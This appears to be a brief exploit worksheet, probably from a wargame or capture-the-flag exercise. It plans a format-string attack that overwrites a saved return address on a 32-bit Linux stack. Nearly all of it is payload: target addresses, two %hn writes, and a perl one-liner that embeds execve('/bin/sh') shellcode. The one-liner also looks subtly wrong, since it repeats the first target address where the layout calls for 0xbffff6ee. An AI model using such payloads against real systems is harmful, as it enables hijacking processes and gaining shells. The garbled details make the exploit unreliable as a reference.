address of buffer in the stack :    0xbffff4e0
address of $eip :                   0xbffff6ec

payload :

0xE8 0xF4 0xFF 0xBF to write at 0xbffff6ec
best option : write it two times.

0xE8 0xF4 : 62696 at 0xbffff6ec
0xFF 0xBF : 49151 at 0xbffff6ee

[0xbffff6ec (4 bytes)][BBBB][0xbffff6ee (4 bytes)][shellcode (45 bytes)]["%c%c"]["%49069"]["%hn"]["%"]["%hn"]

perl -e 'print "\xec\xf6\xff\xbf" . "BBBB" . "\xec\xf6\xff\xbf".
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh".
    "%c%c%49069d%hn%13627d%hn"'
